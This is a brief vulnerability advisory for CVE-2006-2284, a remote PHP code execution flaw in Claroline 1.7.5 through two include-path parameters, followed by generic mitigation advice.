CVE-2006-2284

Name of the Vulnerable Software and Affected Versions Claroline version 1.7.5

Description The issue allows remote attackers to execute arbitrary PHP code. This is achieved via a URL in the clarolineRepositorySys parameter in 'ldap.inc.php' and the claro CasLibPath parameter in 'casProcess.inc.php'.

Recommendations For Claroline version 1.7.5, consider disabling the clarolineRepositorySys parameter in 'ldap.inc.php' and the claro CasLibPath parameter in 'casProcess.inc.php' as a temporary workaround until a patch is available. Restrict access to 'ldap.inc.php' and 'casProcess.inc.php' to minimize the risk of exploitation. Avoid using the clarolineRepositorySys and claro CasLibPath parameters in the affected API endpoints until the issue is resolved.